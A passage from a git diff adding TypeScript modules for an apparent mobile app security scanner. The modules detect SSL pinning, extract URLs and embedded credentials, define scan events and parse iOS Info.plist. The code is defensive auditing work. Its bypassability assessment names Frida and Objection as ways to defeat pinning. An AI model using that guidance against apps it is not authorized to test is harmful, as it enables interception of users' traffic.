+        // Skip files that can't be read
+      }
+    }
+
+    return {
+      detected: locations.length > 0,
+      implementation,
+      pinnedDomains: [...new Set(pinnedDomains)],
+      locations,
+      bypassable,
+      notes: locations.length > 0 ? `Found ${locations.length} SSL pinning indicators` : undefined,
+    }
+  }
+
+  /**
+   * Detect SSL pinning in iOS code.
+   */
+  export async function detectiOS(
+    sourceFiles: string[],
+    plistContent?: string
+  ): Promise<MobileScanTypes.SSLPinningResult> {
+    log.info("Detecting SSL pinning in iOS", { fileCount: sourceFiles.length })
+
+    let implementation: string | undefined
+    const pinnedDomains: string[] = []
+    const locations: MobileScanTypes.CodeLocation[] = []
+    let bypassable = true
+
+    // Check Info.plist for ATS pinning
+    if (plistContent) {
+      const atsResult = analyzeATSPinning(plistContent)
+      if (atsResult.hasPinning) {
+        return {
+          detected: true,
+          implementation: "ATS",
+          pinnedDomains: atsResult.domains,
+          locations: [{ file: "Info.plist" }],
+          bypassable: false,
+          notes: "Certificate pinning via App Transport Security",
+        }
+      }
+    }
+
+    // Scan source files
+    for (const file of sourceFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of IOS_PATTERNS) {
+          for (const regex of pattern.patterns) {
+            for (let i = 0; i < lines.length; i++) {
+              if (regex.test(lines[i])) {
+                if (!implementation) {
+                  implementation = pattern.implementation
+                  bypassable = pattern.bypassable
+                }
+
+                locations.push({
+                  file,
+                  line: i + 1,
+                  snippet: lines[i].trim(),
+                })
+
+                // Try to extract pinned domains
+                const domains = extractPinnedDomainsFromCode(content)
+                pinnedDomains.push(...domains)
+                break
+              }
+            }
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return {
+      detected: locations.length > 0,
+      implementation,
+      pinnedDomains: [...new Set(pinnedDomains)],
+      locations,
+      bypassable,
+      notes: locations.length > 0 ? `Found ${locations.length} SSL pinning indicators` : undefined,
+    }
+  }
+
+  /**
+   * Analyze Network Security Config for pinning.
+   */
+  function analyzeNetworkSecurityConfig(xml: string): { hasPinning: boolean; domains: string[] } {
+    const domains: string[] = []
+    let hasPinning = false
+
+    // Check for pin-set
+    if (xml.includes("<pin-set") || xml.includes("<pin ")) {
+      hasPinning = true
+
+      // Extract domains
+      const domainMatches = xml.matchAll(/<domain[^>]*>([^<]+)<\/domain>/g)
+      for (const match of domainMatches) {
+        domains.push(match[1].trim())
+      }
+    }
+
+    return { hasPinning, domains }
+  }
+
+  /**
+   * Analyze ATS for pinning.
+   */
+  function analyzeATSPinning(plist: string): { hasPinning: boolean; domains: string[] } {
+    const domains: string[] = []
+    let hasPinning = false
+
+    // Check for pinned domains
+    if (plist.includes("NSPinnedDomains") || plist.includes("NSPinnedCAIdentities") || plist.includes("NSPinnedLeafIdentities")) {
+      hasPinning = true
+
+      // Extract domains (simplified - actual plist parsing would be more complex)
+      const domainMatches = plist.matchAll(/<key>([^<]+)<\/key>\s*<dict>[^]*?NSPinned/g)
+      for (const match of domainMatches) {
+        domains.push(match[1].trim())
+      }
+    }
+
+    return { hasPinning, domains }
+  }
+
+  /**
+   * Extract pinned domains from code.
+   */
+  function extractPinnedDomainsFromCode(code: string): string[] {
+    const domains: string[] = []
+
+    // Common patterns for domain strings near pinning code
+    const domainPatterns = [
+      /\.add\s*\(\s*["']([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})["']/g,
+      /domain[s]?\s*[:=]\s*["']([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})["']/gi,
+      /host[s]?\s*[:=]\s*["']([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})["']/gi,
+      /["']([a-zA-Z0-9.-]+\.(com|net|org|io|co|api)[a-zA-Z]*)["']/g,
+    ]
+
+    for (const pattern of domainPatterns) {
+      const matches = code.matchAll(pattern)
+      for (const match of matches) {
+        const domain = match[1]
+        // Filter out common false positives
+        if (
+          !domain.includes("example") &&
+          !domain.includes("localhost") &&
+          !domain.includes("test.") &&
+          domain.length > 4
+        ) {
+          domains.push(domain)
+        }
+      }
+    }
+
+    return [...new Set(domains)]
+  }
+
+  /**
+   * Check if pinning can be bypassed with common tools.
+   */
+  export function assessBypassability(result: MobileScanTypes.SSLPinningResult): {
+    fridaBypass: boolean
+    objectionBypass: boolean
+    sslUnpinning: boolean
+    notes: string[]
+  } {
+    const notes: string[] = []
+
+    // Most implementations can be bypassed with Frida
+    const fridaBypass = result.bypassable !== false
+
+    // Objection can bypass most common implementations
+    const objectionBypass = result.implementation !== "ATS" && result.bypassable !== false
+
+    // Generic SSL unpinning tools work on most implementations
+    const sslUnpinning = result.bypassable !== false
+
+    if (result.implementation === "ATS" && !result.bypassable) {
+      notes.push("ATS pinning requires device-level bypass or jailbreak")
+    }
+
+    if (result.implementation === "AndroidNativeConfig") {
+      notes.push("Network Security Config can be bypassed by modifying the APK or using Frida")
+    }
+
+    if (result.implementation === "CustomTrustManager" || result.implementation === "CustomSecTrust") {
+      notes.push("Custom implementations may require manual analysis for bypass")
+    }
+
+    return {
+      fridaBypass,
+      objectionBypass,
+      sslUnpinning,
+      notes,
+    }
+  }
+
+  /**
+   * Generate finding for missing SSL pinning.
+   */
+  export function createMissingPinningFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Missing SSL/TLS Certificate Pinning",
+      description:
+        "The application does not implement certificate pinning, making it vulnerable to man-in-the-middle attacks if an attacker can install a trusted CA certificate on the device.",
+      severity: "medium",
+      owaspMobile: "M5",
+      category: "network",
+      recommendation:
+        "Implement certificate pinning using platform-provided mechanisms (Network Security Config for Android, ATS for iOS) or libraries like TrustKit, OkHttp CertificatePinner.",
+      references: [
+        "https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning",
+        "https://developer.android.com/training/articles/security-config",
+        "https://developer.apple.com/documentation/security/preventing_insecure_network_connections",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/common/urls.ts b/packages/opencode/src/pentest/mobilescan/common/urls.ts
new file mode 100644
index 00000000000..3aa43de7951
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/urls.ts
@@ -0,0 +1,453 @@
+/**
+ * @fileoverview URL and Endpoint Extraction
+ *
+ * Extracts URLs, API endpoints, and network destinations from mobile applications.
+ *
+ * @module pentest/mobilescan/common/urls
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.common.urls" })
+
+/**
+ * URL extraction namespace.
+ */
+export namespace UrlExtractor {
+  /**
+   * URL patterns to extract.
+   */
+  export const URL_PATTERNS: RegExp[] = [
+    // Standard URLs
+    /https?:\/\/[^\s"'<>()]+/gi,
+    // URLs without protocol
+    /(?:www\.)[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z]{2,})+(?:\/[^\s"'<>()]*)?/gi,
+    // IP addresses with optional port
+    /https?:\/\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?::\d+)?(?:\/[^\s"'<>()]*)?/gi,
+    // WebSocket URLs
+    /wss?:\/\/[^\s"'<>()]+/gi,
+    // FTP URLs
+    /ftp:\/\/[^\s"'<>()]+/gi,
+  ]
+
+  /**
+   * Internal/development URL indicators.
+   */
+  export const INTERNAL_INDICATORS = [
+    "localhost",
+    "127.0.0.1",
+    "0.0.0.0",
+    "10.",
+    "192.168.",
+    "172.16.",
+    "172.17.",
+    "172.18.",
+    "172.19.",
+    "172.20.",
+    "172.21.",
+    "172.22.",
+    "172.23.",
+    "172.24.",
+    "172.25.",
+    "172.26.",
+    "172.27.",
+    "172.28.",
+    "172.29.",
+    "172.30.",
+    "172.31.",
+    ".local",
+    ".internal",
+    ".test",
+    ".dev",
+    "-dev.",
+    "-staging.",
+    "-test.",
+    "dev.",
+    "staging.",
+    "test.",
+    "debug.",
+    "qa.",
+    "sandbox.",
+  ]
+
+  /**
+   * Dangerous URL patterns.
+   */
+  export const DANGEROUS_PATTERNS = [
+    /[?&](?:password|passwd|pwd|secret|token|key|api_key)=/i,
+    /\/\/[^:]+:[^@]+@/, // Embedded credentials
+  ]
+
+  /**
+   * Extract URLs from files.
+   */
+  export async function extractFromFiles(files: string[]): Promise<MobileScanTypes.ExtractedURL[]> {
+    log.info("Extracting URLs from files", { fileCount: files.length })
+
+    const urls: MobileScanTypes.ExtractedURL[] = []
+    const seenUrls = new Set<string>()
+
+    for (const file of files) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of URL_PATTERNS) {
+          pattern.lastIndex = 0
+          let match
+
+          while ((match = pattern.exec(content)) !== null) {
+            const url = cleanUrl(match[0])
+
+            // Skip duplicates
+            if (seenUrls.has(url)) {
+              continue
+            }
+
+            // Skip invalid URLs
+            if (!isValidUrl(url)) {
+              continue
+            }
+
+            seenUrls.add(url)
+
+            // Find line number
+            const beforeMatch = content.substring(0, match.index)
+            const lineNumber = (beforeMatch.match(/\n/g) || []).length + 1
+
+            const extracted = parseUrl(url, file, lineNumber, lines[lineNumber - 1])
+            if (extracted) {
+              urls.push(extracted)
+            }
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    log.info("URL extraction complete", { urlCount: urls.length })
+    return urls
+  }
+
+  /**
+   * Extract URLs from strings array.
+   */
+  export function extractFromStrings(strings: string[]): MobileScanTypes.ExtractedURL[] {
+    const urls: MobileScanTypes.ExtractedURL[] = []
+    const seenUrls = new Set<string>()
+
+    for (const str of strings) {
+      for (const pattern of URL_PATTERNS) {
+        pattern.lastIndex = 0
+        let match
+
+        while ((match = pattern.exec(str)) !== null) {
+          const url = cleanUrl(match[0])
+
+          // Skip duplicates
+          if (seenUrls.has(url)) {
+            continue
+          }
+
+          // Skip invalid URLs
+          if (!isValidUrl(url)) {
+            continue
+          }
+
+          seenUrls.add(url)
+
+          const extracted = parseUrl(url, "strings")
+          if (extracted) {
+            urls.push(extracted)
+          }
+        }
+      }
+    }
+
+    return urls
+  }
+
+  /**
+   * Clean URL (remove trailing punctuation, etc.).
+   */
+  function cleanUrl(url: string): string {
+    // Remove trailing punctuation
+    let cleaned = url.replace(/[.,;:!?)}\]]+$/, "")
+
+    // Remove trailing quotes
+    cleaned = cleaned.replace(/["']+$/, "")
+
+    // Remove fragment
+    const fragmentIndex = cleaned.indexOf("#")
+    if (fragmentIndex > 0) {
+      cleaned = cleaned.substring(0, fragmentIndex)
+    }
+
+    return cleaned
+  }
+
+  /**
+   * Check if URL is valid.
+   */
+  function isValidUrl(url: string): boolean {
+    // Skip very short URLs
+    if (url.length < 10) {
+      return false
+    }
+
+    // Skip URLs that are just file extensions
+    if (/^https?:\/\/[^/]*\.[a-z]{2,4}$/i.test(url) && !url.includes("www.")) {
+      return false
+    }
+
+    // Skip data URIs
+    if (url.startsWith("data:")) {
+      return false
+    }
+
+    // Skip javascript: URIs
+    if (url.startsWith("javascript:")) {
+      return false
+    }
+
+    // Skip mailto: URIs
+    if (url.startsWith("mailto:")) {
+      return false
+    }
+
+    // Basic URL validation
+    try {
+      const parsed = new URL(url.startsWith("www.") ? `https://${url}` : url)
+      return ["http:", "https:", "ws:", "wss:", "ftp:"].includes(parsed.protocol)
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Parse URL and create ExtractedURL.
+   */
+  function parseUrl(
+    url: string,
+    file: string,
+    line?: number,
+    snippet?: string
+  ): MobileScanTypes.ExtractedURL | null {
+    try {
+      const fullUrl = url.startsWith("www.") ? `https://${url}` : url
+      const parsed = new URL(fullUrl)
+
+      const isInternal = INTERNAL_INDICATORS.some((indicator) => fullUrl.toLowerCase().includes(indicator))
+
+      const hasCredentials = DANGEROUS_PATTERNS.some((pattern) => pattern.test(fullUrl))
+
+      return {
+        id: `url_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`,
+        url: fullUrl,
+        scheme: parsed.protocol.replace(":", ""),
+        host: parsed.hostname,
+        port: parsed.port ? parseInt(parsed.port, 10) : undefined,
+        path: parsed.pathname !== "/" ? parsed.pathname : undefined,
+        location: {
+          file,
+          line,
+          snippet: snippet?.trim(),
+        },
+        isHttps: parsed.protocol === "https:" || parsed.protocol === "wss:",
+        isInternal,
+        hasCredentials,
+      }
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Categorize URLs.
+   */
+  export function categorizeUrls(urls: MobileScanTypes.ExtractedURL[]): {
+    api: MobileScanTypes.ExtractedURL[]
+    web: MobileScanTypes.ExtractedURL[]
+    internal: MobileScanTypes.ExtractedURL[]
+    insecure: MobileScanTypes.ExtractedURL[]
+    withCredentials: MobileScanTypes.ExtractedURL[]
+  } {
+    const result = {
+      api: [] as MobileScanTypes.ExtractedURL[],
+      web: [] as MobileScanTypes.ExtractedURL[],
+      internal: [] as MobileScanTypes.ExtractedURL[],
+      insecure: [] as MobileScanTypes.ExtractedURL[],
+      withCredentials: [] as MobileScanTypes.ExtractedURL[],
+    }
+
+    const apiIndicators = ["/api/", "/v1/", "/v2/", "/v3/", "/graphql", "/rest/", "/json", "/xml", ".json", ".xml"]
+
+    for (const url of urls) {
+      // Internal URLs
+      if (url.isInternal) {
+        result.internal.push(url)
+      }
+
+      // Insecure HTTP
+      if (!url.isHttps && !url.isInternal) {
+        result.insecure.push(url)
+      }
+
+      // URLs with credentials
+      if (url.hasCredentials) {
+        result.withCredentials.push(url)
+      }
+
+      // API endpoints
+      const path = url.path?.toLowerCase() || ""
+      if (apiIndicators.some((ind) => path.includes(ind) || url.host.includes("api."))) {
+        result.api.push(url)
+      } else {
+        result.web.push(url)
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Extract domains from URLs.
+   */
+  export function extractDomains(urls: MobileScanTypes.ExtractedURL[]): string[] {
+    const domains = new Set<string>()
+
+    for (const url of urls) {
+      // Get root domain
+      const parts = url.host.split(".")
+      if (parts.length >= 2) {
+        const rootDomain = parts.slice(-2).join(".")
+        domains.add(rootDomain)
+      }
+      domains.add(url.host)
+    }
+
+    return [...domains].sort()
+  }
+
+  /**
+   * Create finding for insecure HTTP URL.
+   */
+  export function createInsecureUrlFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    url: MobileScanTypes.ExtractedURL
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Insecure HTTP URL Detected",
+      description: `The application uses an insecure HTTP URL (${url.url}). Data transmitted over HTTP can be intercepted by attackers on the network.`,
+      severity: "medium",
+      owaspMobile: "M5",
+      category: "network",
+      codeLocation: url.location,
+      evidence: url.url,
+      recommendation:
+        "Use HTTPS for all network communications. If the server doesn't support HTTPS, implement certificate pinning to prevent MITM attacks.",
+      references: ["https://owasp.org/www-project-mobile-security-testing-guide/"],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Create finding for URL with embedded credentials.
+   */
+  export function createCredentialsInUrlFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    url: MobileScanTypes.ExtractedURL
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Credentials in URL Detected",
+      description:
+        "The application uses a URL that contains embedded credentials or sensitive parameters. This exposes credentials in logs, browser history, and network traffic.",
+      severity: "high",
+      owaspMobile: "M1",
+      category: "credentials",
+      codeLocation: url.location,
+      evidence: `URL with credentials: ${url.host}${url.path || ""}`,
+      recommendation:
+        "Never embed credentials in URLs. Use secure authentication mechanisms like OAuth tokens in headers or request bodies.",
+      references: [
+        "https://owasp.org/www-project-mobile-security-testing-guide/",
+        "https://cwe.mitre.org/data/definitions/598.html",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Create finding for internal/development URL.
+   */
+  export function createInternalUrlFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    urls: MobileScanTypes.ExtractedURL[]
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Internal/Development URLs Detected",
+      description: `The application contains ${urls.length} internal or development URL(s) that may expose internal infrastructure information or be unreachable in production.`,
+      severity: "low",
+      owaspMobile: "M8",
+      category: "configuration",
+      evidence: urls
+        .slice(0, 5)
+        .map((u) => u.url)
+        .join(", "),
+      recommendation:
+        "Remove internal/development URLs from production builds. Use build flavors or environment variables to configure different URLs for different environments.",
+      references: ["https://owasp.org/www-project-mobile-security-testing-guide/"],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate URL analysis summary.
+   */
+  export function generateSummary(urls: MobileScanTypes.ExtractedURL[]): {
+    total: number
+    https: number
+    http: number
+    internal: number
+    external: number
+    withCredentials: number
+    uniqueDomains: number
+  } {
+    const categories = categorizeUrls(urls)
+    const domains = extractDomains(urls)
+
+    return {
+      total: urls.length,
+      https: urls.filter((u) => u.isHttps).length,
+      http: urls.filter((u) => !u.isHttps).length,
+      internal: categories.internal.length,
+      external: urls.length - categories.internal.length,
+      withCredentials: categories.withCredentials.length,
+      uniqueDomains: domains.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/events.ts b/packages/opencode/src/pentest/mobilescan/events.ts
new file mode 100644
index 00000000000..0e7ee7864f4
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/events.ts
@@ -0,0 +1,298 @@
+/**
+ * @fileoverview Mobile Scanner Events
+ *
+ * Bus event definitions for mobile application scanning operations.
+ *
+ * @module pentest/mobilescan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Mobile scanner events namespace.
+ */
+export namespace MobileScanEvents {
+  /**
+   * Mobile scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.mobilescan.scan_started",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      profile: z.string(),
+      platform: z.enum(["android", "ios"]),
+      packageName: z.string(),
+    })
+  )
+
+  /**
+   * Mobile scan completed.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.mobilescan.scan_completed",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      platform: z.enum(["android", "ios"]),
+      findingsCount: z.number(),
+      criticalCount: z.number(),
+      highCount: z.number(),
+      mediumCount: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "stopped", "partial"]),
+    })
+  )
+
+  /**
+   * Mobile scan failed.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.mobilescan.scan_failed",
+    z.object({
+      scanId: z.string(),
+      appId: z.string().optional(),
+      error: z.string(),
+      phase: z.string().optional(),
+    })
+  )
+
+  /**
+   * Mobile app analyzed.
+   */
+  export const AppAnalyzed = BusEvent.define(
+    "pentest.mobilescan.app_analyzed",
+    z.object({
+      appId: z.string(),
+      platform: z.enum(["android", "ios"]),
+      packageName: z.string(),
+      version: z.string(),
+      fileHash: z.string(),
+    })
+  )
+
+  /**
+   * Finding detected.
+   */
+  export const FindingDetected = BusEvent.define(
+    "pentest.mobilescan.finding_detected",
+    z.object({
+      scanId: z.string(),
+      findingId: z.string(),
+      owaspMobile: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+      title: z.string(),
+      component: z.string().optional(),
+    })
+  )
+
+  /**
+   * Secret found.
+   */
+  export const SecretFound = BusEvent.define(
+    "pentest.mobilescan.secret_found",
+    z.object({
+      scanId: z.string(),
+      secretType: z.string(),
+      location: z.string(),
+      confidence: z.enum(["high", "medium", "low"]),
+    })
+  )
+
+  /**
+   * Permission risk detected.
+   */
+  export const PermissionRisk = BusEvent.define(
+    "pentest.mobilescan.permission_risk",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      permission: z.string(),
+      risk: z.enum(["critical", "high", "medium", "low"]),
+      protection: z.string(),
+    })
+  )
+
+  /**
+   * SSL pinning status detected.
+   */
+  export const SSLPinningStatus = BusEvent.define(
+    "pentest.mobilescan.ssl_pinning_status",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      detected: z.boolean(),
+      implementation: z.string().optional(),
+      pinnedDomains: z.array(z.string()),
+    })
+  )
+
+  /**
+   * SSL pinning missing.
+   */
+  export const SSLPinningMissing = BusEvent.define(
+    "pentest.mobilescan.ssl_pinning_missing",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      domain: z.string().optional(),
+    })
+  )
+
+  /**
+   * Exported component detected.
+   */
+  export const ComponentExported = BusEvent.define(
+    "pentest.mobilescan.component_exported",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      component: z.string(),
+      type: z.enum(["activity", "service", "receiver", "provider"]),
+      hasPermission: z.boolean(),
+      intentFilters: z.number(),
+    })
+  )
+
+  /**
+   * Root/jailbreak detection found.
+   */
+  export const RootDetectionFound = BusEvent.define(
+    "pentest.mobilescan.root_detection_found",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      platform: z.enum(["android", "ios"]),
+      methodCount: z.number(),
+      strength: z.enum(["strong", "medium", "weak"]),
+    })
+  )
+
+  /**
+   * Weak cryptography detected.
+   */
+  export const WeakCryptoDetected = BusEvent.define(
+    "pentest.mobilescan.weak_crypto_detected",
+    z.object({
+      scanId: z.string(),
+      algorithm: z.string(),
+      location: z.string(),
+      issue: z.string(),
+    })
+  )
+
+  /**
+   * Insecure storage detected.
+   */
+  export const InsecureStorageDetected = BusEvent.define(
+    "pentest.mobilescan.insecure_storage_detected",
+    z.object({
+      scanId: z.string(),
+      storageType: z.string(),
+      issue: z.string(),
+      location: z.string().optional(),
+    })
+  )
+
+  /**
+   * Third-party library vulnerability.
+   */
+  export const LibraryVulnerability = BusEvent.define(
+    "pentest.mobilescan.library_vulnerability",
+    z.object({
+      scanId: z.string(),
+      library: z.string(),
+      version: z.string().optional(),
+      vulnerabilities: z.array(z.string()),
+    })
+  )
+
+  /**
+   * URL extracted.
+   */
+  export const URLExtracted = BusEvent.define(
+    "pentest.mobilescan.url_extracted",
+    z.object({
+      scanId: z.string(),
+      url: z.string(),
+      isHttps: z.boolean(),
+      hasCredentials: z.boolean(),
+    })
+  )
+
+  /**
+   * Binary protection status.
+   */
+  export const BinaryProtectionStatus = BusEvent.define(
+    "pentest.mobilescan.binary_protection_status",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      platform: z.enum(["android", "ios"]),
+      pie: z.boolean().optional(),
+      arc: z.boolean().optional(),
+      stackCanary: z.boolean().optional(),
+      debuggable: z.boolean().optional(),
+      obfuscated: z.boolean().optional(),
+    })
+  )
+
+  /**
+   * Manifest analyzed.
+   */
+  export const ManifestAnalyzed = BusEvent.define(
+    "pentest.mobilescan.manifest_analyzed",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      platform: z.enum(["android", "ios"]),
+      packageName: z.string(),
+      version: z.string(),
+      debuggable: z.boolean().optional(),
+      allowBackup: z.boolean().optional(),
+      exportedComponents: z.number(),
+    })
+  )
+
+  /**
+   * Decompilation started.
+   */
+  export const DecompileStarted = BusEvent.define(
+    "pentest.mobilescan.decompile_started",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      tool: z.string(),
+      outputDir: z.string(),
+    })
+  )
+
+  /**
+   * Decompilation completed.
+   */
+  export const DecompileCompleted = BusEvent.define(
+    "pentest.mobilescan.decompile_completed",
+    z.object({
+      scanId: z.string(),
+      appId: z.string(),
+      tool: z.string(),
+      outputDir: z.string(),
+      filesExtracted: z.number(),
+      duration: z.number(),
+    })
+  )
+
+  /**
+   * Scan progress update.
+   */
+  export const ScanProgress = BusEvent.define(
+    "pentest.mobilescan.scan_progress",
+    z.object({
+      scanId: z.string(),
+      phase: z.string(),
+      progress: z.number(), // 0-100
+      message: z.string().optional(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/mobilescan/index.ts b/packages/opencode/src/pentest/mobilescan/index.ts
new file mode 100644
index 00000000000..16a01ec532f
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/index.ts
@@ -0,0 +1,30 @@
+/**
+ * @fileoverview Mobile Application Scanner Module
+ *
+ * Comprehensive mobile security scanner for Android APK and iOS IPA analysis.
+ * Detects OWASP Mobile Top 10 vulnerabilities and integrates with mobile security tools.
+ *
+ * @module pentest/mobilescan
+ */
+
+// Core exports
+export { MobileScanTypes } from "./types"
+export { MobileScanEvents } from "./events"
+export { MobileScanStorage, type StorageConfig } from "./storage"
+export { MobileScanProfiles } from "./profiles"
+
+// Parser exports
+export * from "./parsers"
+
+// Common analysis exports
+export * from "./common"
+
+// Android analysis exports
+export * from "./android"
+
+// iOS analysis exports
+export * from "./ios"
+
+// Orchestrator and tool exports
+export { MobileScanOrchestrator } from "./orchestrator"
+export { MobileScanTool } from "./tool"
diff --git a/packages/opencode/src/pentest/mobilescan/ios/index.ts b/packages/opencode/src/pentest/mobilescan/ios/index.ts
new file mode 100644
index 00000000000..663ea5689a7
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/ios/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @fileoverview iOS Analysis Module
+ *
+ * iOS-specific security analysis for IPA files.
+ *
+ * @module pentest/mobilescan/ios
+ */
+
+export { PlistAnalyzer } from "./plist"
+export { iOSSecurityAnalyzer } from "./security"
diff --git a/packages/opencode/src/pentest/mobilescan/ios/plist.ts b/packages/opencode/src/pentest/mobilescan/ios/plist.ts
new file mode 100644
index 00000000000..be0eb7765ae
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/ios/plist.ts
@@ -0,0 +1,472 @@
+/**
+ * @fileoverview iOS Info.plist Analysis
+ *
+ * Parses and analyzes iOS Info.plist files for security configurations.
+ *
+ * @module pentest/mobilescan/ios/plist
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.ios.plist" })
+
+/**
+ * iOS Plist analyzer namespace.
+ */
+export namespace PlistAnalyzer {
+  /**
+   * Parse Info.plist file.
+   */
+  export async function parsePlist(plistPath: string): Promise<MobileScanTypes.IOSPlist> {
+    log.info("Parsing Info.plist", { path: plistPath })
+
+    const content = await fs.readFile(plistPath, "utf-8")
+    return parsePlistContent(content)
+  }
+
+  /**
+   * Parse Info.plist XML content.
+   */
+  export function parsePlistContent(xml: string): MobileScanTypes.IOSPlist {
+    // Helper to extract plist value
+    const getValue = (key: string): string | undefined => {
+      const regex = new RegExp(`<key>${key}</key>\\s*<string>([^<]*)</string>`, "i")
+      const match = xml.match(regex)
+      return match ? match[1] : undefined
+    }
+
+    const getArrayValues = (key: string): string[] => {
+      const regex = new RegExp(`<key>${key}</key>\\s*<array>([\\s\\S]*?)</array>`, "i")
+      const match = xml.match(regex)
+      if (!match) return []
+
+      const values: string[] = []
+      const stringMatches = match[1].matchAll(/<string>([^<]*)<\/string>/g)
+      for (const m of stringMatches) {
+        values.push(m[1])
+      }
+      return values
+    }
+
+    const getNumberArrayValues = (key: string): number[] => {
+      const regex = new RegExp(`<key>${key}</key>\\s*<array>([\\s\\S]*?)</array>`, "i")
+      const match = xml.match(regex)
+      if (!match) return []
+
+      const values: number[] = []
+      const intMatches = match[1].matchAll(/<integer>(\d+)<\/integer>/g)
+      for (const m of intMatches) {
+        values.push(parseInt(m[1], 10))
+      }
+      return values
+    }
+
+    const getDictValue = (key: string): Record<string, string> => {
+      const regex = new RegExp(`<key>${key}</key>\\s*<dict>([\\s\\S]*?)</dict>`, "i")
+      const match = xml.match(regex)
+      if (!match) return {}
+
+      const values: Record<string, string> = {}
+      const keyValueMatches = match[1].matchAll(/<key>([^<]*)<\/key>\s*<string>([^<]*)<\/string>/g)
+      for (const m of keyValueMatches) {
+        values[m[1]] = m[2]
+      }
+      return values
+    }
+
+    // Parse bundle info
+    const bundleId = getValue("CFBundleIdentifier") || ""
+    const bundleName = getValue("CFBundleName") || ""
+    const bundleDisplayName = getValue("CFBundleDisplayName")
+    const version = getValue("CFBundleShortVersionString") || "1.0"
+    const buildVersion = getValue("CFBundleVersion") || "1"
+    const minOSVersion = getValue("MinimumOSVersion") || getValue("LSMinimumSystemVersion") || "9.0"
+
+    // Parse device family
+    const deviceFamily = getNumberArrayValues("UIDeviceFamily")
+
+    // Parse URL schemes
+    const urlSchemes: string[] = []
+    const urlTypesMatch = xml.match(/<key>CFBundleURLTypes<\/key>\s*<array>([\s\S]*?)<\/array>/i)
+    if (urlTypesMatch) {
+      const schemesMatches = urlTypesMatch[1].matchAll(/<key>CFBundleURLSchemes<\/key>\s*<array>([\s\S]*?)<\/array>/g)
+      for (const m of schemesMatches) {
+        const schemeStrings = m[1].matchAll(/<string>([^<]*)<\/string>/g)
+        for (const s of schemeStrings) {
+          urlSchemes.push(s[1])
+        }
+      }
+    }
+
+    // Parse queried URL schemes
+    const queriedUrlSchemes = getArrayValues("LSApplicationQueriesSchemes")
+
+    // Parse background modes
+    const backgroundModes = getArrayValues("UIBackgroundModes")
+
+    // Parse usage descriptions
+    const usageDescriptions: Record<string, string> = {}
+    const usageKeys = [
+      "NSCameraUsageDescription",
+      "NSMicrophoneUsageDescription",
+      "NSPhotoLibraryUsageDescription",
+      "NSLocationWhenInUseUsageDescription",
+      "NSLocationAlwaysUsageDescription",
+      "NSLocationAlwaysAndWhenInUseUsageDescription",
+      "NSContactsUsageDescription",
+      "NSCalendarsUsageDescription",
